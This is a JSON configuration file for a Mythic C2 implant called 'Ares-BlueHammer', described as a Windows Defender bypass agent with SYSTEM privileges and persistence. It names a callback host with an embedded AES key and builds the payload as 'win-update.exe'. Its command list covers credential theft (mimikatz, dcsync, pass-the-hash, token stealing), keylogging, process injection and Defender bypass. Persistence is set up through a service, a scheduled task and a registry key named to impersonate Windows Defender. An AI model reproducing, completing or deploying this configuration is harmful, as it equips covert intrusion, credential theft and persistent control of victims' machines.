{
    "name": "Ares-BlueHammer",
    "description": "Windows Defender bypass agent using BlueHammer exploit with SYSTEM privileges and persistence - Configured for your Mythic C2",
    "author": "Ares Team",
    "version": "1.0",
    "mythic_version": "2.3",
    "supported_os": ["windows"],
    "c2_profiles": [
        {
            "c2_profile": "http",
            "c2_profile_is_p2p": false,
            "c2_profile_parameters": {
                "AESPSK": {
                    "dec_key": "MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=",
                    "enc_key": "MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=",
                    "value": "aes256_hmac"
                },
                "callback_host": "http://gateofbabylon.space",
                "callback_interval": 10,
                "callback_jitter": 23,
                "callback_port": 80,
                "encrypted_exchange_check": true,
                "headers": {
                    "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
                },
                "killdate": "2027-04-02",
                "post_uri": "data",
                "proxy_host": "",
                "proxy_pass": "",
                "proxy_port": "",
                "proxy_user": ""
            }
        }
    ],
    "build_parameters": {
        "build_command": "pyinstaller --onefile --console ares_agent_refactored.py",
        "output_type": "WinExe",
        "filename": "win-update.exe",
        "debug": true,
        "shellcode_bypass": "Continue on fail",
        "adjust_filename": false,
        "enable_keying": false,
        "keying_method": "Hostname",
        "keying_value": "",
        "registry_path": "",
        "registry_value": "",
        "registry_comparison": "Matches",
        "shellcode_format": "Binary"
    },
    "commands": [
        "assembly_inject",
        "blockdlls",
        "cat",
        "cd",
        "cp",
        "dcsync",
        "download",
        "execute_assembly",
        "execute_coff",
        "execute_pe",
        "exit",
        "get_injection_techniques",
        "getprivs",
        "getsystem",
        "ifconfig",
        "inject",
        "inline_assembly",
        "jobkill",
        "jobs",
        "jump_psexec",
        "jump_wmi",
        "keylog_inject",
        "kill",
        "ldap_query",
        "link",
        "list_registered_files",
        "listpipes",
        "load",
        "ls",
        "make_token",
        "mimikatz",
        "mkdir",
        "mv",
        "net_dclist",
        "net_localgroup",
        "net_localgroup_member",
        "net_shares",
        "netstat",
        "powerpick",
        "powershell",
        "powershell_import",
        "ppid",
        "printspoofer",
        "ps",
        "psinject",
        "pth",
        "pwd",
        "reg_query",
        "reg_write_value",
        "register_assembly",
        "register_coff",
        "register_file",
        "remove_registered_file",
        "rev2self",
        "rm",
        "rpfwd",
        "run",
        "sc",
        "screenshot",
        "screenshot_inject",
        "set_injection_technique",
        "shell",
        "shinject",
        "sleep",
        "socks",
        "spawn",
        "spawnto_x64",
        "spawnto_x86",
        "steal_token",
        "ticket_cache_add",
        "ticket_cache_extract",
        "ticket_cache_list",
        "ticket_cache_purge",
        "ticket_store_add",
        "ticket_store_list",
        "ticket_store_purge",
        "unlink",
        "upload",
        "whoami",
        "wmiexecute",
        "bypass_defender",
        "establish_persistence"
    ],
    "deployment": {
        "temp_directory": "C:\\Windows\\Temp",
        "service_name": "WinDefendUpdate",
        "scheduled_task": "WindowsDefenderMaintenance",
        "registry_key": "WindowsDefenderUpdate"
    }
}